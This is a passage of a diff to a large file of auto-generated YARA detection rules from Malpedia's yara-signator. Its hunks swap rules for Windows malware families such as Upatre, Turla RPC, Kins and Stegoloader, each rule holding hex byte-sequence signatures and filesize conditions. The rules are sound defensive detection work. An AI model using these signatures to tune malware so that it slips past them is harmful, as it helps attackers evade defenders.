-		$sequence_6 = { f3c3 e9???????? e8???????? e9???????? 6a14 68???????? e8???????? }
-		$sequence_7 = { 68???????? ffd6 8b45fc 85c0 }
-		$sequence_8 = { 6801000080 ff15???????? 56 8d85f8feffff }
-		$sequence_9 = { 7408 8a5a01 42 84db }
-		$sequence_10 = { 57 6800000004 6a00 6a00 }
-		$sequence_11 = { 6a00 8bf8 6a00 57 ff15???????? 8d45fc }
-		$sequence_12 = { 5e 5b 5d c3 c60200 }
-		$sequence_13 = { 84c9 75f4 eb0d 803800 7408 8a5a01 }
-		$sequence_14 = { ff30 c745fc00000000 57 ff15???????? }
-		$sequence_15 = { 6a00 8d8db4f7ffff 51 50 }
-		$sequence_16 = { ff15???????? 8d85b8f7ffff 50 6800080000 }
-		$sequence_17 = { 03d7 3b56f0 7611 8b46ec 8d4eec }
-		$sequence_18 = { ff5004 8b46f8 0346f4 57 ff7508 }
-		$sequence_19 = { 7412 8b01 52 8d95f0fdffff 52 ff10 8b95ecfdffff }
-		$sequence_20 = { ff76f8 e8???????? 83c41c 895ef8 897ef0 5b 5f }
-		$sequence_21 = { ffd6 ff7704 ffd6 ff770c ffd6 ff7708 ffd6 }
-		$sequence_22 = { 50 e8???????? ff76f8 e8???????? }
-		$sequence_23 = { 8b17 8bcf ff5210 8b17 8bcf ff5208 }
-		$sequence_24 = { 898df8fbffff 8d8dfcfbffff 51 ffb5f0fbffff 8bcb ff5038 85c0 }
-		$sequence_25 = { ff15???????? ba180c0000 b940000000 ff15???????? }
-		$sequence_26 = { ff15???????? 488d542430 488d8c2440020000 ff15???????? }
-		$sequence_27 = { e8???????? ba00040000 b940000000 ff15???????? }
-		$sequence_28 = { 99 83e203 03c2 c1f802 89442440 }
-		$sequence_29 = { d3f8 0fb60d???????? d3e0 85c0 }
-		$sequence_30 = { d3e8 0fb6c8 8b05???????? d3e0 }
-		$sequence_31 = { 8b05???????? d3e0 8b0d???????? 03c8 }
-		$sequence_32 = { ff15???????? 41b804010000 488d542430 488d4c2430 ff15???????? 85c0 }
-		$sequence_33 = { 55 8bec ff4d08 755d 833d????????04 }
-		$sequence_34 = { 85c0 750e 68???????? ff15???????? c20800 53 }
-		$sequence_35 = { ff15???????? 68c0d40100 ff15???????? e9???????? }
-		$sequence_36 = { 8b3d???????? 85c0 7507 68???????? ffd7 6a00 }
-		$sequence_37 = { 8d0441 33d2 b905000000 f7f1 }
-		$sequence_38 = { c705????????00000000 c705????????03000000 c705????????00000000 c705????????04000000 ff15???????? 85c0 750b }
-		$sequence_39 = { ff15???????? c20800 53 8b1d???????? 57 0f57c0 }
-		$sequence_40 = { 750b 68???????? ff15???????? ff35???????? }
-		$sequence_41 = { 68???????? 68???????? ff15???????? a3???????? 85c0 750e }
-		$sequence_42 = { c705????????00000000 ffd3 8b3d???????? 85c0 }
-		$sequence_43 = { 50 6a00 ff15???????? 6a00 6a00 68???????? }
-		$sequence_44 = { 03048db0354200 50 ff15???????? 5d }
-		$sequence_45 = { 03048db0354200 eb05 b8???????? f6402820 }
-		$sequence_46 = { 03048db0354200 eb02 8bc6 80782900 }
+		$sequence_0 = { 52 53 57 68???????? 8bf0 e8???????? }
+		$sequence_1 = { 89442420 ff15???????? 837c243400 8bf0 0f86fd000000 }
+		$sequence_2 = { 57 e9???????? e8???????? 85c0 7458 }
+		$sequence_3 = { 8d442424 50 895c2424 895c2420 895c2428 }
+		$sequence_4 = { 83c440 8d0c24 68???????? 51 }
+		$sequence_5 = { 52 8d442424 50 e8???????? 8d4c241c }
+		$sequence_6 = { 56 50 33db e8???????? 8d4c240c 68???????? }
+		$sequence_7 = { e8???????? 8b4c2478 8b542474 51 52 8d442424 50 }
+		$sequence_8 = { 0f94c1 8d0c8d01000000 51 52 }
+		$sequence_9 = { ffd5 66833c467c 0f8487000000 66833f21 752a 57 ffd5 }
 
 	condition:
-		7 of them and filesize < 70128640
+		7 of them and filesize < 139264
 }
-rule MALPEDIA_Win_Atlantida_Auto : FILE
+rule MALPEDIA_Win_Aperetif_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "869bb208-99fc-58cc-b6f3-123be4e2dd14"
+		id = "795b83b3-4cb3-590f-beec-45294ced14b3"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.atlantida"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.atlantida_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.aperetif"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.aperetif_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "de93365ad64d88523ed488fd5b5635b3ae5e4c0d8a34a9201e696d8414f63e31"
+		logic_hash = "9b2b21b13b2a3f0effe3ce03cc46e7cfe39d710a1bc6f103bbb173ad06ff9edf"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -105607,32 +105768,32 @@ rule MALPEDIA_Win_Atlantida_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bfa 3bcf 7459 56 8d7114 6690 8d4e04 }
-		$sequence_1 = { ed f6a3ff1cd671 c1f6a3 ff7082 59 255caf7f8f d34636 }
-		$sequence_2 = { e8???????? c7442400c69a991b e8???????? ba847b1e24 8d8cd226571b73 660fc1d1 8b94576ca2c2b7 }
-		$sequence_3 = { e9???????? d3840c9e29cbff 8994483c5396ff 8bd1 23ca 5a 8b940da629cbff }
-		$sequence_4 = { 8b8c16f7c9e0bd 8d845284cd81f7 0fabd0 8db416fbc9e0bd 52 219414f8c9e0bd 33cb }
-		$sequence_5 = { e8???????? c1c803 33d8 8d14cdbca7077c 52 d3e1 13e8 }
-		$sequence_6 = { ff7508 57 e8???????? 5e 5d c3 56 }
-		$sequence_7 = { ba1b3187c4 f7d2 668b843a1c3187c4 8d9454a4620e89 b918903d41 22cd c1f968 }
-		$sequence_8 = { f6d8 0fca 32d8 660fbafa38 c1e2bb 13c4 c0faa1 }
-		$sequence_9 = { e8???????? 8b13 41 be35e00fe4 41 0fb7ce 6644 }
+		$sequence_0 = { ba???????? c1e803 8d0c40 0fb7c6 c1e803 03c8 03c9 }
+		$sequence_1 = { ff15???????? 8bf8 89be8c020000 85ff 750d ff15???????? 8bf0 }
+		$sequence_2 = { ff15???????? 85c0 0f858d060000 ff15???????? 6a0f 68???????? 8d4d58 }
+		$sequence_3 = { e8???????? 83c410 894500 85c0 7536 681e010000 68???????? }
+		$sequence_4 = { e8???????? 83c408 85c0 0f8427010000 83fe06 7506 f6431018 }
+		$sequence_5 = { f6044dda3d8a0001 740e 8b450c 8b00 8b8094000000 8a0401 0fb6c0 }
+		$sequence_6 = { dd5c2410 f20f10542410 f20f59c2 f20f5cc8 e9???????? 85ff 7466 }
+		$sequence_7 = { ff0481 8b8424bc000000 ff81000b0000 40 898424bc000000 3b8424b8000000 7512 }
+		$sequence_8 = { 8b33 85f6 0f8482000000 57 8b7b04 897dfc 3bf7 }
+		$sequence_9 = { ff742448 ff742424 ff742448 53 e8???????? 83c414 85c0 }
 
 	condition:
-		7 of them and filesize < 13793280
+		7 of them and filesize < 10500096
 }
-rule MALPEDIA_Win_Lcpdot_Auto : FILE
+rule MALPEDIA_Win_Abaddon_Pos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "722ca0df-2e50-52e0-943d-1427766ffd0e"
+		id = "be050b96-89fd-5c20-8efb-0926890fbf17"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lcpdot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lcpdot_auto.yar#L1-L164"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.abaddon_pos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.abaddon_pos_auto.yar#L1-L162"
 		license_url = "N/A"
-		logic_hash = "4f9e99ce8bcf6813bbe31f126896fdedd8b3b4250e6a5e72eec4968c5a5d08a6"
+		logic_hash = "1a83ebbcd5f12576760f9d6a9d7b6611b9e3fe508d3c27448de58b24db2266af"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -105646,37 +105807,37 @@ rule MALPEDIA_Win_Lcpdot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e9???????? c705????????01000000 e8???????? 83f801 }
-		$sequence_1 = { 41b804000000 e8???????? 85c0 400f94c6 8bc6 488bac24a8080000 4c8ba42460080000 }
-		$sequence_2 = { 8b4e10 51 ffd7 5f 5e c3 55 }
-		$sequence_3 = { e8???????? 488d542420 488bcb 41b8e8030000 e8???????? b801000000 }
-		$sequence_4 = { 8b95a8fbffff 89480c 895010 897014 897818 a1???????? }
-		$sequence_5 = { 51 c785f8f3ffff80f10000 ff15???????? 391f 7515 5f 5e }
-		$sequence_6 = { 57 4883ec20 488b7940 4c8bc2 488bd9 488b5708 }
-		$sequence_7 = { 8a4001 3a4101 752b 57 ff15???????? }
-		$sequence_8 = { 8d4620 83c40c 8d5002 8d9b00000000 668b08 83c002 }
-		$sequence_9 = { 8bd0 8bf0 ff15???????? 488bd8 4885c0 751b }
-		$sequence_10 = { e8???????? 48baeea7c64b37894100 4c8bd8 488b4348 482bd0 4883fa01 }
-		$sequence_11 = { dc35???????? 8b3d???????? dd9dacfbffff 33c0 }
-		$sequence_12 = { b940000000 8bd3 4c89a42450020000 448be3 ff15???????? }
-		$sequence_13 = { c785d8fdffff484d5bd2 c785dcfdffff03071c2a c785e0fdffff48a02861 c785e4fdffff82060fb1 }
-		$sequence_14 = { 4533c9 48c744243000000000 458d4103 ba00000040 c744242880000000 48896c2468 }
+		$sequence_0 = { 750a 83fb3c 7605 e9???????? }
+		$sequence_1 = { 7417 80fa00 7612 80fa7c 7505 e9???????? }
+		$sequence_2 = { 42 89d9 01d1 803930 7205 803939 760f }
+		$sequence_3 = { 80fd3e 7406 41 80fd3f 756e 49 }
+		$sequence_4 = { 0fafc3 038560feffff 6a00 6a00 }
+		$sequence_5 = { 6860ea0000 ffb40564feffff ff15???????? 89d8 6bc004 }
+		$sequence_6 = { 740a 80393d 7405 803944 7536 80bea80100000d }
+		$sequence_7 = { 6a00 ff15???????? 8945f0 6a00 ff15???????? c785c0feffff28010000 6a00 }
+		$sequence_8 = { 31c0 48 31d2 8a841eb8010000 }
+		$sequence_9 = { 7605 e9???????? 48 034510 48 0500040000 803800 }
+		$sequence_10 = { 89e5 48 83ec20 48 c7c100000000 }
+		$sequence_11 = { 2c30 80ea30 666bc00a 48 01d0 48 89da }
+		$sequence_12 = { 48 89c7 48 8d86b8010000 48 }
+		$sequence_13 = { 81c3f8030000 8903 48 31db 48 8b96d0050000 }
+		$sequence_14 = { 750d c6013d c786b401000002000000 eb13 }
 
 	condition:
-		7 of them and filesize < 257024
+		7 of them and filesize < 40960
 }
-rule MALPEDIA_Win_Upatre_Auto : FILE
+rule MALPEDIA_Win_Selfmake_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "73539601-8658-55a3-ad49-65acd97f978e"
+		id = "15836b07-3544-5bf9-b844-02538b3af65c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.upatre"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.upatre_auto.yar#L1-L169"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.selfmake"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.selfmake_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "8c959d494139a03c01baced655928fcf1bda3e51a3d094a6d0ce455b32426f5d"
+		logic_hash = "93ed4fceea8c314a1c4a918011ab44630046aab19d1594880ab759bf63042ba9"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -105690,38 +105851,32 @@ rule MALPEDIA_Win_Upatre_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7404 66ab ebf5 8b7594 }
-		$sequence_1 = { 33c0 ac 8945a4 897da0 }
-		$sequence_2 = { 3c01 740c b053 66ab b045 }
-		$sequence_3 = { 66ad 8945ac 33c0 8bc8 }
-		$sequence_4 = { b02f 66ab ff7590 33c0 b404 57 03f8 }
-		$sequence_5 = { 50 6880000000 6a02 50 6a02 6800000040 ff75f0 }
-		$sequence_6 = { ff75f0 ff55f8 50 ebe7 56 ff55fc }
-		$sequence_7 = { b02f 66ab 8b45a8 ff5504 33c9 8ac8 ff5508 }
-		$sequence_8 = { 8b4dfc 51 e8???????? 83c408 8945d8 }
-		$sequence_9 = { 0f84fa000000 8b55f8 52 8b45d8 }
-		$sequence_10 = { 8b4dc4 51 e8???????? 8b55d0 52 e8???????? e9???????? }
-		$sequence_11 = { 0dc21748db 60 23e7 1b800fa46451 }
-		$sequence_12 = { 753b 6a01 8d4dcf 51 8b55fc }
-		$sequence_13 = { 51 e8???????? 83c40c eb2b 8b55f4 8b420c 50 }
-		$sequence_14 = { 05c8000000 3bc8 7c22 0fb74df8 }
-		$sequence_15 = { eb58 8b4df4 8b510c 52 e8???????? 83c404 0fb7c0 }
+		$sequence_0 = { 8b17 8b4208 8bcf ffd0 33c9 8844241b c74424540f000000 }
+		$sequence_1 = { 99 83e203 03c2 46 c1f802 83c104 3bf0 }
+		$sequence_2 = { 89442439 8944243d 89442441 89442445 6689442449 }
+		$sequence_3 = { 8b542414 8a02 8b5c246c 8bf3 3c7f }
+		$sequence_4 = { 8d342f 83f804 7214 8b16 3b11 }
+		$sequence_5 = { 68???????? e8???????? 83c040 50 e8???????? 83c408 e8???????? }
+		$sequence_6 = { 8b5608 8b4254 8b4e14 8b561c 50 51 52 }
+		$sequence_7 = { 8b442450 7304 8d442450 8b550c }
+		$sequence_8 = { 8a4c1001 884dec 8b55ec 81e2ff000000 83e207 83fa05 }
+		$sequence_9 = { 51 50 e8???????? 8bf8 8a4500 }
 
 	condition:
-		7 of them and filesize < 294912
+		7 of them and filesize < 932864
 }
-rule MALPEDIA_Win_Linseningsvr_Auto : FILE
+rule MALPEDIA_Win_Unidentified_116_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9dcd591f-d0ec-5190-8dad-c6b3b9eab825"
+		id = "dcbb6fc8-8b09-5285-9468-49ab6b078756"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.linseningsvr"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.linseningsvr_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_116"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_116_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "0cfff1e97d9fd891165604e0b9cd757922199a1abb3f822338fa50a684f756d6"
+		logic_hash = "cbb333fd9c34e1cf4f6b4bb87d2c0b2963e42381083d5b2c6bc817e5ca64d87b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -105735,32 +105890,32 @@ rule MALPEDIA_Win_Linseningsvr_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d34b558874000 832600 83c60c 4a 75f7 8b00 8b35???????? }
-		$sequence_1 = { 47 3bfe 7ce7 68???????? e8???????? 8b15???????? b900010000 }
-		$sequence_2 = { 83f908 7229 f3a5 ff2495982c4000 8bc7 ba03000000 }
-		$sequence_3 = { e8???????? b900010000 33c0 8dbc2450040000 55 }
-		$sequence_4 = { 8d3c8dc08d4000 c1e603 8b0f f644310401 7456 50 e8???????? }
-		$sequence_5 = { 7c13 80fb78 7f0e 0fbec3 8a801c714000 }
-		$sequence_6 = { 52 56 66895c2448 6689442456 ff15???????? 8bd8 }
-		$sequence_7 = { 8944241c 33ff 8bc8 83f940 5d }
-		$sequence_8 = { 8088818c400008 40 3dff000000 72f1 56 }
-		$sequence_9 = { 8ac8 80c120 8888808b4000 eb1f 83f861 7213 83f87a }
+		$sequence_0 = { 8b7718 48 8bd6 48 8d4615 48 894718 }
+		$sequence_1 = { c70016000000 e8???????? 48 8b03 bf02000000 48 8b08 }
+		$sequence_2 = { 8bf0 48 89442438 48 8bd8 48 89442420 }
+		$sequence_3 = { ba02000000 e8???????? 48 8bcb e8???????? 33c0 48 }
+		$sequence_4 = { 8d052146ffff 48 0f45c1 48 8b4c2440 48 33cc }
+		$sequence_5 = { e8???????? 33c0 48 83c428 c3 49 8bcb }
+		$sequence_6 = { 8bd2 48 8bfa 48 99 49 8bd9 }
+		$sequence_7 = { 8bcb 660f7f742420 49 8bf1 49 8bf8 e8???????? }
+		$sequence_8 = { 8bf2 4c 8bf9 8b2d???????? b9c8000000 e8???????? 48 }
+		$sequence_9 = { ff4808 834a5802 48 8b4218 48 85c0 7405 }
 
 	condition:
-		7 of them and filesize < 81360
+		7 of them and filesize < 1040384
 }
-rule MALPEDIA_Win_Kgh_Spy_Auto : FILE
+rule MALPEDIA_Win_Kins_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2adff718-5ead-5f74-948f-adeec6ff4a99"
+		id = "d3620de7-0502-5d17-b47d-c76d16c08a91"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kgh_spy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.kgh_spy_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kins"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.kins_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "16434283b98a9ec3028553199436a1655677ca0b41828e5ff9ba53861a24c40d"
+		logic_hash = "f2c2bfcf5e7ce9dcb0b01d359d338a97b9128c8cf189b0c6d157b8680e4a55a3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -105774,32 +105929,32 @@ rule MALPEDIA_Win_Kgh_Spy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4889442448 48c7442430ffffffff 48ff442430 488b442448 488b4c2430 803c0800 75eb }
-		$sequence_1 = { e8???????? eb40 4c8d35b7910000 488b0d???????? e9???????? 4c8d35b4910000 488b0d???????? }
-		$sequence_2 = { 32c0 e9???????? 488d442460 4889442448 }
-		$sequence_3 = { 4889442428 4c894c2420 4d8bc8 4c8bc2 488bd1 488d0dcd0d0000 }
-		$sequence_4 = { ff15???????? c744243041000000 eb0a 8b442430 ffc0 89442430 837c24305b }
-		$sequence_5 = { 488b8c24a0000000 ff15???????? 89442468 8b442468 8bc8 e8???????? 48898424d8000000 }
-		$sequence_6 = { 48c744242000000000 4c8b4c2478 448b442440 488b542450 488b4c2448 }
-		$sequence_7 = { ff15???????? 4889442460 48837c2460ff 7507 32c0 }
-		$sequence_8 = { 813850450000 7526 488b442438 83b88400000001 7218 b808000000 486bc000 }
-		$sequence_9 = { 4c8d351a920000 488bfb 83e31f 48c1ff05 }
+		$sequence_0 = { 85c9 75f8 85c0 7503 33c0 40 56 }
+		$sequence_1 = { 8bce e8???????? 85c0 0f8566ffffff 8b45f4 8b4d10 c1e005 }
+		$sequence_2 = { bf80000000 57 e8???????? 33c9 89460c 3bc1 7505 }
+		$sequence_3 = { 33c9 3b4708 8d542448 0f95c1 89742450 89742418 }
+		$sequence_4 = { 8d45f4 7503 8d45fc 33f6 }
+		$sequence_5 = { 7ced 33c0 40 c20400 }
+		$sequence_6 = { 83e37f c1e007 4e 0bc3 47 80e180 7526 }
+		$sequence_7 = { 85db 0f8532010000 8b442420 8b08 49 81e1ffffff0f 8908 }
+		$sequence_8 = { 7427 8b542418 8b450c e8???????? 84c0 7417 8b54241c }
+		$sequence_9 = { e8???????? 8d742448 e8???????? 33ff 85ff }
 
 	condition:
-		7 of them and filesize < 207872
+		7 of them and filesize < 548864
 }
-rule MALPEDIA_Win_Turla_Rpc_Auto : FILE
+rule MALPEDIA_Win_Credraptor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "66c1d7fa-741a-51ae-994f-511185fa9310"
+		id = "e8ed5662-d50d-5276-970c-7ae5bc800549"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.turla_rpc"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.turla_rpc_auto.yar#L1-L168"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.credraptor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.credraptor_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "47df29c03096bb465616e91b5c4f41a104d4cb12e1b0226d75d72ad4e8590fd9"
+		logic_hash = "a2be5c2e7aba128bc464089768bae22c73dd588e7ba2a1d837a215f744aa4638"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -105813,38 +105968,32 @@ rule MALPEDIA_Win_Turla_Rpc_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c745b06970746f c745b472536163 66c745b86c00 ff15???????? }
-		$sequence_1 = { 66c7852c0100002626 c6852e01000055 c745b0193a3431 c745b4193c3727 c745b834272c14 c645bc55 c7854001000030163930 }
-		$sequence_2 = { c645bc55 c7854001000030163930 c78544010000343b2025 c6854801000055 }
-		$sequence_3 = { 66c785ec0000000255 c785a0000000193a3431 c785a4000000193c3727 c785a800000034272c02 }
-		$sequence_4 = { 66c7850c0100003a3b c6850e01000055 c745c007303431 c745c4133c3930 c645c855 c744244806393030 }
-		$sequence_5 = { c3 488d053bda0000 488d542458 488d4c2420 }
-		$sequence_6 = { c785f800000021133c39 66c785fc0000003002 c685fe00000055 c785d000000012302113 }
-		$sequence_7 = { c78544010000343b2025 c6854801000055 c78560010000013c3830 c785640100003a202155 }
-		$sequence_8 = { c644247e55 c745883336393a 66c7458c2630 c6458e55 c744245033273034 66c74424543155 c744243033273030 }
-		$sequence_9 = { 6a01 8d45bc 50 ff9540ffffff 8d8550ffffff 50 8d8548ffffff }
-		$sequence_10 = { 8d8588feffff 50 57 ff9570fdffff 8b8d6cfdffff 89413c }
-		$sequence_11 = { 5d c20400 8b1d???????? 8d4900 8d44243c 50 ff15???????? }
-		$sequence_12 = { 8b7dbc 57 ff15???????? 83c404 }
-		$sequence_13 = { 50 50 688f000000 ff15???????? 56 }
-		$sequence_14 = { 66c785bcfeffff6b00 c785c8feffff6674656c 66c785ccfeffff6c00 c785a8feffff66777269 66c785acfeffff7465 c685aefeffff00 c785a0feffff6d616c6c }
-		$sequence_15 = { 6a00 8d45f8 50 ff750c ff37 56 }
+		$sequence_0 = { e8???????? 8b7dfc 8945f8 83f811 0f84a4feffff eb53 837df400 }
+		$sequence_1 = { f7470400040000 7408 8b7f08 897dfc eb24 0fb607 2d9d000000 }
+		$sequence_2 = { e8???????? ff4648 8b45e8 0fb608 80b9????????70 8b7e48 7516 }
+		$sequence_3 = { ba00080000 83c408 66895112 5f 5e 5b 8be5 }
+		$sequence_4 = { 8b55ec 894804 33c9 c6400300 895008 89480c }
+		$sequence_5 = { e8???????? 01450c 83c404 f7460400200000 7429 8b4f0c 8d450c }
+		$sequence_6 = { ffd1 83c414 85c0 0f85a2020000 8b45f8 0fb64dfb 53 }
+		$sequence_7 = { ebd2 8bc3 c1f805 8d3c85c0814c00 8bf3 83e61f c1e606 }
+		$sequence_8 = { c1e108 0bc8 750a 5f 5e 8d4165 5b }
+		$sequence_9 = { e8???????? 8b9510ffffff 8bbd00ffffff 0fb6c0 018524ffffff 8d3c17 8bcb }
 
 	condition:
-		7 of them and filesize < 311296
+		7 of them and filesize < 1728512
 }
-rule MALPEDIA_Win_Coronavirus_Ransomware_Auto : FILE
+rule MALPEDIA_Win_Stegoloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "25a17b3a-8384-5e84-a1b5-2dd73e5ee0cf"
+		id = "9b5ddd81-f495-5df3-b903-3b034270cab3"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.coronavirus_ransomware"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.coronavirus_ransomware_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stegoloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.stegoloader_auto.yar#L1-L175"
 		license_url = "N/A"
-		logic_hash = "d0b11b2a26c2b9ac5d26c61d4c9566b412c8fa0dfeb2d6ec35815769f67a7b2e"
+		logic_hash = "94caf24cac0989b6c0d5f1d1f91d703a3bc60fcd01d5e92e33c9c96d7f83e047"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -105858,32 +106007,38 @@ rule MALPEDIA_Win_Coronavirus_Ransomware_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6685c9 75f5 56 2bc2 57 8b7df8 d1f8 }
-		$sequence_1 = { 56 50 89742474 89742478 e8???????? }
-		$sequence_2 = { 8bf0 83feff 7424 85f6 7420 }
-		$sequence_3 = { 7e58 a1???????? 50 e8???????? 8b0d???????? 83c404 6aff }
-		$sequence_4 = { 895004 8bfb 8b1d???????? 68???????? 66894808 c745f400000000 ff15???????? }
-		$sequence_5 = { 8b442414 8bd0 2b54bc5c 83fa01 750c 47 8944bc5c }
-		$sequence_6 = { 40 ebeb e8???????? 8b75a0 e9???????? }
-		$sequence_7 = { 51 833d????????00 c745fc00000000 752d b8???????? }
-		$sequence_8 = { e8???????? 035dc4 807d0802 8b7dc8 0f8583000000 807d0c01 757d }
-		$sequence_9 = { 84c0 7426 0fb60d???????? 0fb6c0 0fb68080fa4000 03c1 }
+		$sequence_0 = { 85c0 7c2e 6a10 e8???????? 3bc3 }
+		$sequence_1 = { 56 33db 53 ff742414 8bf1 8b06 ff5004 }
+		$sequence_2 = { 59 7430 83c604 85c0 7633 8bd8 }
+		$sequence_3 = { 8945f4 8945f8 8945fc 8d45f0 8bf1 50 }
+		$sequence_4 = { 83ec10 53 33c0 56 50 8945f4 }
+		$sequence_5 = { 5e 5b c9 c3 56 33c9 }
+		$sequence_6 = { c645b44f c645b520 c645b626 c645b726 c645b820 c645b953 c645ba59 }
+		$sequence_7 = { c645d845 c645d920 c645da38 c645db2e c645dc30 c645dd3b c645de20 }
+		$sequence_8 = { 33c9 83ceff 394c240c 7629 57 8b44240c 0fb61401 }
+		$sequence_9 = { 8a07 83c40c 46 3c43 }
+		$sequence_10 = { 50 6aff 83c604 895dfc ff55e8 85c0 0f85b5000000 }
+		$sequence_11 = { bf00200000 397df8 c645ff00 7303 8b7df8 6a14 }
+		$sequence_12 = { 8bec 83ec14 64a130000000 8945fc 8b45fc }
+		$sequence_13 = { 889c05f1feffff 8d85f0feffff 8945f8 8d4508 }
+		$sequence_14 = { 880a 75e9 eb5b 83e803 eb02 }
+		$sequence_15 = { 72ef 8b06 8d4df8 51 8bce }
 
 	condition:
-		7 of them and filesize < 235520
+		7 of them and filesize < 802816
 }
-rule MALPEDIA_Win_Backspace_Auto : FILE
+rule MALPEDIA_Win_Ati_Agent_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "74f06e56-cb1b-558b-a9a6-675b90898d32"
+		id = "63f89f4a-1d36-5323-b29e-727f0aaf8a03"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.backspace"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.backspace_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ati_agent"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ati_agent_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "1f557e82713be82d4effefb67945984b55368207555daca9d42390f29b2b045a"
+		logic_hash = "7c411e9ca433461f4c960c7a6933d449b1b0c508c2b59dbdab9cb50ad78bd018"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -105897,71 +106052,71 @@ rule MALPEDIA_Win_Backspace_Auto : FILE
